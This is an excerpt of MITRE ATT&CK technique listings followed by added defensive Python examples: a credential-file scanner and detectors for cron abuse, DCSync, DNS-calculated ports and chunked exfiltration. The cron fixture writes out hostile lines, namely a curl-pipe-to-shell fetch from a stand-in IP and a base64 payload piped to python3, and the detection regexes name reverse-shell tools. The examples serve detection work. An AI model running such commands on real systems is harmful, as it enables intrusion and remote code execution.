| ID | Name | Description | Tactic |
|---|---|---|---|
| T1659 | Content Injection | Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems throug… | initial-access |
| T1218.002 | Control Panel | Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (co… | defense-evasion |
| T1196 | Control Panel Items | Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are… | defense-evasion |
| T1136 | Create Account | Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With … | persistence |
| T1578.002 | Create Cloud Instance | An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade de… | defense-evasion |
| T1134.002 | Create Process with Token | Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes… | defense-evasion |
| T1578.001 | Create Snapshot | An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-tim… | defense-evasion |
| T1543 | Create or Modify System Process | Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence.… | persistence |
| T1056.004 | Credential API Hooking | Adversaries may hook into Windows application programming interface (API) functions and Linux system functions to collec… | collection |
| T1110.004 | Credential Stuffing | Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts throu… | credential-access |
| T1589.001 | Credentials | Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be… | reconnaissance |
| T1552.001 | Credentials In Files | Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. The… | credential-access |
| T1555 | Credentials from Password Stores | Adversaries may search for common password storage locations to obtain user credentials.(Citation: F-Secure The Dukes) P… | credential-access |
| T1503 | Credentials from Web Browsers | Adversaries may acquire credentials from web browsers by reading files specific to the target browser. (Citation: Talos… | credential-access |
| T1555.003 | Credentials from Web Browsers | Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos O… | credential-access |
| T1081 | Credentials in Files | Adversaries may search local file systems and remote file shares for files containing passwords. These can be files crea… | credential-access |
| T1214 | Credentials in Registry | The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may … | credential-access |
| T1552.002 | Credentials in Registry | Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry store… | credential-access |
| T1053.003 | Cron | Adversaries may abuse the `cron` utility to perform task scheduling for initial or recurring execution of mal… | execution |
| T1094 | Custom Command and Control Protocol | Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an exi… | command-and-control |
| T1024 | Custom Cryptographic Protocol | Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, s… | command-and-control |
| T1213.004 | Customer Relationship Management Software | Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is u… | collection |
| T1003.006 | DCSync | Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's a… | credential-access |
| T1557.003 | DHCP Spoofing | Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHC… | credential-access |
| T1574.001 | DLL | Adversaries may abuse dynamic-link library files (DLLs) in order to achieve persistence, escalate privileges, and evade … | persistence |
| T1038 | DLL Search Order Hijacking | Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft DLL Search) A… | persistence |
| T1073 | DLL Side-Loading | Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be … | defense-evasion |
| T1574.002 | DLL Side-Loading | Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL](https://attack.mitre.org/tec… | persistence |
| T1590.002 | DNS | Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include… | reconnaissance |
| T1071.004 | DNS | Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network fil… | command-and-control |
| T1568.003 | DNS Calculation | Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use … | command-and-control |
| T1583.002 | DNS Server | Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-comprom… | resource-development |
| T1584.002 | DNS Server | Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, a… | resource-development |
| T1596.001 | DNS/Passive DNS | Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may inc… | reconnaissance |
| T1002 | Data Compressed | An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it p… | exfiltration |
| T1485 | Data Destruction | Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to… | impact |
| T1132 | Data Encoding | Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and con… | command-and-control |
| T1022 | Data Encrypted | Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or … | exfiltration |
| T1486 | Data Encrypted for Impact | Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to … | impact |
| T1565 | Data Manipulation | Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threat… | impact |
| T1001 | Data Obfuscation | Adversaries may obfuscate command and control traffic to make it more difficult to detect.(Citation: Bitdefender FunnyDr… | command-and-control |
| T1074 | Data Staged | Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separ… | collection |
| T1030 | Data Transfer Size Limits | An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresho… | exfiltration |
| T1530 | Data from Cloud Storage | Adversaries may access data from cloud storage. Many IaaS providers offer solutions for online data object storage such… | collection |
| T1602 | Data from Configuration Repository | Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are … | collection |
| T1213 | Data from Information Repositories | Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that … | collection |
| T1005 | Data from Local System | Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine… | collection |
| T1039 | Data from Network Shared Drive | Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can b… | collection |
| T1025 | Data from Removable Media | Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive… | collection |
| T1213.006 | Databases | Adversaries may leverage databases to mine valuable information. These databases may be hosted on-premises or in the clo… | collection |
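The Credentials In Files entry (T1552.001) describes searching file systems and shares for insecurely stored credentials. The same search is what a defender runs to find those files first. The scanner below is an added example, not code from MITRE ATT&CK or from this listing: the sample files are constructed (the AWS key id is Amazon's published example value, not a live key), the pattern set is an assumed starting point rather than an exhaustive one, and matches are redacted before reporting so the hunt itself does not become a second copy of the secrets.

```python
"""Scan files for insecurely stored credentials (T1552.001, defender side).

Added example; not MITRE ATT&CK code. SAMPLE_FILES is constructed, PATTERNS
is an assumed starting set, and the AWS key id is Amazon's documented example.
"""
import os
import re

PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(AKIA|ASIA)[0-9A-Z]{16}\b"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH |PGP )?PRIVATE KEY"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b"),
    # scheme://user:password@host
    "url_with_password": re.compile(r"[a-z][a-z0-9+.-]*://[^/\s:@]+:[^/\s@]+@"),
    # PASSWORD=..., secret: "...", api_key = ...; no leading \b so DB_PASSWORD= matches
    "password_assignment": re.compile(
        r"(?i)(password|passwd|pwd|secret|api[_-]?key)\s*[:=]\s*['\"]?([^\s'\"]{6,})"),
}

SKIP_DIRS = {".git", "node_modules", "__pycache__"}
MAX_BYTES = 2 * 1024 * 1024  # skip huge files; they are rarely config

# Constructed sample tree: path -> contents.
SAMPLE_FILES = {
    "app/.env": "DB_HOST=db.internal\nDB_PASSWORD=Winter2024!\nDEBUG=false\n",
    "deploy/aws.cfg": "[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\n",
    "ops/backup.sh": "#!/bin/sh\npg_dump postgres://backup:s3cr3tpw@db.internal/app > /srv/dump.sql\n",
    "README.md": "Set DB_PASSWORD in your environment; never commit it.\n",
    "keys/id_ed25519": "-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXkt...\n",
}


def redact(match_text):
    """Keep a 4-character prefix so the finding is recognisable, mask the rest."""
    return match_text[:4] + "*" * (len(match_text) - 4)


def scan_text(path, text):
    """Return one finding per (line, pattern) hit, with the match redacted."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, rx in PATTERNS.items():
            m = rx.search(line)
            if m:
                findings.append({"path": path, "line": lineno,
                                 "kind": kind, "match": redact(m.group(0))})
    return findings


def scan_samples(files=SAMPLE_FILES):
    """Scan the in-memory sample tree."""
    out = []
    for path, text in files.items():
        out.extend(scan_text(path, text))
    return out


def scan_tree(root):
    """Scan a real directory tree, skipping VCS/dependency dirs and binaries."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > MAX_BYTES:
                    continue
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue
            if b"\0" in data[:8192]:
                continue  # binary file
            findings.extend(scan_text(path, data.decode("utf-8", "replace")))
    return findings


if __name__ == "__main__":
    for f in scan_samples():
        print(f"{f['path']}:{f['line']} {f['kind']} {f['match']}")
```

Four of the five sample files trip a pattern; README.md mentions DB_PASSWORD but assigns nothing, so it does not. Point `scan_tree` at a checkout or a mounted share to run the same hunt for real; tune `PATTERNS` to the secret formats your environment actually issues.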
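The Cron entry (T1053.003) covers abuse of `cron` for initial or recurring execution. What that abuse usually looks like in a crontab is a payload in a world-writable or hidden path, a fetch piped straight into a shell, or a decode-and-run one-liner, often on an every-minute or at-boot schedule. The triage below is an added example, not code from MITRE ATT&CK: the sample crontab is constructed, the indicator regexes are an assumed starting set rather than a complete rule base, and `hunt_host` reads the standard Linux cron locations only if they exist and are readable.

```python
"""Triage crontab entries for signs of abuse (T1053.003).

Added example; not MITRE ATT&CK code. SAMPLE_CRONTAB is constructed and the
indicators are an assumed starting set.
"""
import glob
import os
import re

# Assumed indicators.
SUSPICIOUS_PATH = re.compile(r"/(tmp|dev/shm|var/tmp)/|/\.[^./\s]")          # temp or hidden dir
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b")           # fetch | sh
DECODE_AND_RUN = re.compile(r"base64\s+(-d|--decode)|echo\s+[A-Za-z0-9+/=]{20,}")
REVERSE_SHELL = re.compile(r"/dev/tcp/|\b(nc|ncat)\b.*\s-e\s")
SPECIALS = {"@reboot", "@hourly", "@daily", "@midnight", "@weekly",
            "@monthly", "@yearly", "@annually"}

# Constructed /etc/crontab-style sample (system layout: schedule, user, command).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * * www-data curl -s http://198.51.100.7/u.sh | sh
@reboot  backup  /dev/shm/.x/agent -q
0 3 * * * root /usr/local/bin/backup.sh --target /mnt/nas
*/5 * * * * root echo aW1wb3J0IG9zO29zLnN5c3RlbSgnaWQnKQ== | base64 -d | python3
"""


def parse_crontab(text, system=True):
    """Yield (schedule, user, command). system=True is the /etc/crontab and
    /etc/cron.d layout with a user field; per-user spool files have none."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value line
        if line.split()[0] in SPECIALS:
            parts = line.split(None, 1)
            if len(parts) < 2:
                continue
            schedule, rest = parts
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue
            schedule, rest = " ".join(fields[:5]), fields[5]
        if system:
            user, command = (rest.split(None, 1) + [""])[:2]
        else:
            user, command = None, rest
        yield schedule, user, command.strip()


def triage(schedule, command):
    """Return the list of indicators an entry trips (empty means benign-looking)."""
    reasons = []
    if SUSPICIOUS_PATH.search(command):
        reasons.append("payload in temp or hidden path")
    if PIPE_TO_SHELL.search(command):
        reasons.append("downloads and pipes to a shell")
    if DECODE_AND_RUN.search(command):
        reasons.append("decodes an embedded payload")
    if REVERSE_SHELL.search(command):
        reasons.append("reverse shell primitive")
    if reasons and schedule in ("* * * * *", "@reboot"):
        reasons.append("every-minute or at-boot schedule")
    return reasons


def hunt(text, system=True):
    """Return [(schedule, user, command, reasons)] for entries that trip an indicator."""
    findings = []
    for schedule, user, command in parse_crontab(text, system):
        reasons = triage(schedule, command)
        if reasons:
            findings.append((schedule, user, command, reasons))
    return findings


CRON_LOCATIONS = ["/etc/crontab", "/etc/cron.d/*",
                  "/var/spool/cron/crontabs/*", "/var/spool/cron/*"]


def hunt_host():
    """Run the triage over this host's readable cron files; spool files use the per-user layout."""
    results = []
    for pattern in CRON_LOCATIONS:
        for path in glob.glob(pattern):
            if not os.path.isfile(path):
                continue
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            results.extend((path,) + f for f in hunt(text, system=not path.startswith("/var/spool/cron")))
    return results


if __name__ == "__main__":
    for schedule, user, command, reasons in hunt(SAMPLE_CRONTAB):
        print(f"[{', '.join(reasons)}] {schedule} {user}: {command}")
```

Three of the six sample entries are flagged; the two Debian-style `run-parts` lines and the nightly backup are not. Regex indicators only catch what they name, so treat a clean result as "nothing obvious" and still diff the files against a known-good baseline.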
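The DCSync entry (T1003.006) describes abusing a domain controller's replication interface to pull credential material. On the wire that looks like a normal DC, so the useful signal is on the DC itself: a Security Event 4662 whose Properties name one of the directory replication control-access rights, exercised by a principal that is not a domain controller or a known sync service. The rule below is an added example, not code from MITRE ATT&CK: the three right GUIDs are the real Active Directory values, while the event records, the account names and the `EXPECTED_REPLICATORS` allowlist are constructed for the example.

```python
"""Hunt for DCSync in Windows Security Event 4662 records (T1003.006).

Added example; not MITRE ATT&CK code. The GUIDs are the real AD extended
rights; the events and the allowlist are constructed for this example.
"""

# Extended rights that permit directory replication. Pulling password
# hashes needs DS-Replication-Get-Changes-All; the other two are still
# worth a look when a non-DC principal exercises them.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

CONTROL_ACCESS = 0x100  # AccessMask bit for a control/extended right

# Assumed for this environment: DC computer accounts and an Entra Connect
# sync account. Build this from your own inventory, not by hand.
EXPECTED_REPLICATORS = {"DC01$", "DC02$", "MSOL_5f3a9c1d2e7b"}

# Constructed 4662 records, reduced to the fields the rule reads.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "CORP",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "CORP",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "CORP",
     "AccessMask": "0x20",  # WriteProperty on a user object, not replication
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4662, "SubjectUserName": "svc_backup", "SubjectDomainName": "CORP",
     "AccessMask": "0x100",
     "Properties": "{89e95b76-444d-4c62-991a-0facbeda640c}"},
    {"EventID": 4624, "SubjectUserName": "jdoe", "SubjectDomainName": "CORP"},
]


def replication_rights(event):
    """Names of the replication rights that appear in the event's Properties."""
    props = event.get("Properties", "").lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]


def is_dcsync_candidate(event):
    """4662 with the control-access bit set and at least one replication right."""
    if event.get("EventID") != 4662:
        return False
    try:
        mask = int(event.get("AccessMask", "0"), 16)
    except ValueError:
        return False
    if not mask & CONTROL_ACCESS:
        return False
    return bool(replication_rights(event))


def detect_dcsync(events, expected=EXPECTED_REPLICATORS):
    """Findings for replication rights exercised by principals outside the allowlist."""
    findings = []
    for ev in events:
        if not is_dcsync_candidate(ev):
            continue
        user = ev["SubjectUserName"]
        if user in expected:
            continue
        rights = replication_rights(ev)
        findings.append({
            "user": f"{ev.get('SubjectDomainName', '')}\\{user}",
            "rights": rights,
            # Without Get-Changes-All the caller cannot pull secrets; rank lower.
            "severity": "high" if "DS-Replication-Get-Changes-All" in rights else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in detect_dcsync(SAMPLE_EVENTS):
        print(f)
```

Only `CORP\jdoe` (high, both replication rights) and `CORP\svc_backup` (medium, filtered-set only) are reported; the DC's own replication and jdoe's unrelated property write are not. Event 4662 for directory objects is not logged unless the "Directory Service Access" subcategory is audited on the DCs, so confirm that before relying on this.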
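The DNS Calculation entry (T1568.003) describes an implant that resolves a name, then computes the real port (and possibly address) from the octets of the answer rather than using a port written into the binary. Both halves of that are shown below as an added example, not code from MITRE ATT&CK: the two formulas in `CANDIDATE_SCHEMES`, the domain names, the addresses and the connection records are all assumed for illustration, since the formula any given family uses is specific to that family. The detector generalises the idea slightly by checking every formula in the candidate set against each post-resolution connection.

```python
"""DNS calculation (T1568.003): implant-side port derivation and a matching detector.

Added example; not MITRE ATT&CK code. Both formulas and all telemetry below
are assumed for illustration.
"""
import ipaddress


def port_high_low(o):
    """Hypothetical scheme: port = first octet * 256 + second octet."""
    a, b, _, _ = o
    return (a << 8) | b


def port_xor_halves(o):
    """Hypothetical scheme: port = (a.b) XOR (c.d) as 16-bit words."""
    a, b, c, d = o
    return ((a << 8) | b) ^ ((c << 8) | d)


CANDIDATE_SCHEMES = {"high_low": port_high_low, "xor_halves": port_xor_halves}


def octets(ip):
    return tuple(ipaddress.IPv4Address(ip).packed)


def implant_endpoint(resolved_ip, scheme="high_low"):
    """(ip, port) an implant using the named scheme would connect to."""
    return resolved_ip, CANDIDATE_SCHEMES[scheme](octets(resolved_ip))


# Constructed telemetry from one workstation: DNS answers, then TCP connections.
DNS_ANSWERS = [
    {"host": "ws17", "qname": "update.example.net", "answer": "10.20.30.40"},
    {"host": "ws17", "qname": "cdn.example.org", "answer": "192.0.2.8"},
]
CONNECTIONS = [
    {"host": "ws17", "dst": "10.20.30.40", "port": 2580},  # 10*256 + 20
    {"host": "ws17", "dst": "192.0.2.8", "port": 443},
    {"host": "ws17", "dst": "10.20.30.40", "port": 443},
]

# Ports too common to be worth a 1-in-65536 coincidence match.
COMMON_PORTS = {22, 25, 53, 80, 443, 8080, 8443}


def detect_dns_calculation(dns_answers, connections, schemes=CANDIDATE_SCHEMES):
    """Flag connections whose destination port equals a candidate calculation
    over the octets of the address DNS returned for that destination."""
    qname_for = {}
    for a in dns_answers:
        qname_for.setdefault((a["host"], a["answer"]), a["qname"])
    findings = []
    for c in connections:
        qname = qname_for.get((c["host"], c["dst"]))
        if qname is None or c["port"] in COMMON_PORTS:
            continue
        o = octets(c["dst"])
        matched = [name for name, f in schemes.items() if f(o) == c["port"]]
        if matched:
            findings.append({"host": c["host"], "qname": qname, "dst": c["dst"],
                             "port": c["port"], "schemes": matched})
    return findings


if __name__ == "__main__":
    print(implant_endpoint("10.20.30.40"))
    for f in detect_dns_calculation(DNS_ANSWERS, CONNECTIONS):
        print(f)
```

Only the connection to 10.20.30.40:2580 is flagged, and only under the `high_low` scheme. The detector catches exactly the formulas you enumerate and nothing else, and each formula has a 1-in-65536 chance of a coincidental hit per connection, so pair a match with the rarity of the queried domain and the process that made the connection before acting on it.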
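The Data Transfer Size Limits entry (T1030) describes exfiltrating in fixed-size chunks so that no single transfer crosses a threshold. The side effect is that the chunks are all the same size, which a flow or proxy log makes visible once you group by source, destination and port. The code below is an added example, not code from MITRE ATT&CK: `chunk_sizes` shows why a limited transfer looks uniform, the flow records are constructed, and the three thresholds are assumed tuning values.

```python
"""Spot chunked exfiltration in flow records (T1030).

Added example; not MITRE ATT&CK code. FLOWS is constructed and the
thresholds are assumed.
"""
from collections import Counter, defaultdict


def chunk_sizes(total_bytes, limit):
    """Sizes of the pieces a transfer of total_bytes is split into under a per-transfer limit."""
    full, rem = divmod(total_bytes, limit)
    return [limit] * full + ([rem] if rem else [])


# Constructed flow records: (src, dst, dst_port, bytes_out) over one hour.
FLOWS = (
    # a 50 MiB staged archive pushed in 1 MiB pieces to a rarely seen host
    [("10.0.5.23", "203.0.113.45", 443, n) for n in chunk_sizes(50 * 1024 * 1024, 1024 * 1024)]
    # ordinary browsing: varied sizes to a popular host
    + [("10.0.5.23", "198.51.100.10", 443, n) for n in (812, 14020, 2231, 98077, 4120, 11, 3302, 6655)]
    # an update client: a few identical mid-size requests, low total volume
    + [("10.0.5.41", "198.51.100.77", 80, 4096) for _ in range(3)]
)

MIN_FLOWS = 10                     # uniform size only matters at volume
MIN_UNIFORM_RATIO = 0.8            # share of flows carrying the modal size
MIN_TOTAL_BYTES = 10 * 1024 * 1024  # filters heartbeats, which are uniform but tiny


def detect_chunked_transfers(flows, min_flows=MIN_FLOWS,
                             min_ratio=MIN_UNIFORM_RATIO, min_total=MIN_TOTAL_BYTES):
    """Findings for (src, dst, port) groups dominated by one transfer size."""
    groups = defaultdict(list)
    for src, dst, port, nbytes in flows:
        groups[(src, dst, port)].append(nbytes)
    findings = []
    for (src, dst, port), sizes in groups.items():
        if len(sizes) < min_flows or sum(sizes) < min_total:
            continue
        size, count = Counter(sizes).most_common(1)[0]
        ratio = count / len(sizes)
        if ratio >= min_ratio:
            findings.append({"src": src, "dst": dst, "port": port, "flows": len(sizes),
                             "chunk": size, "ratio": round(ratio, 2), "total": sum(sizes)})
    return findings


if __name__ == "__main__":
    for f in detect_chunked_transfers(FLOWS):
        print(f)
```

Only the 50 flows of exactly 1 MiB to 203.0.113.45 are reported; the browsing session fails the uniformity test and the update client fails both the flow-count and volume floors. Legitimate bulk tools (backup agents, cloud sync clients) also chunk uniformly, so the useful next step is destination reputation and the originating process, not the size pattern alone.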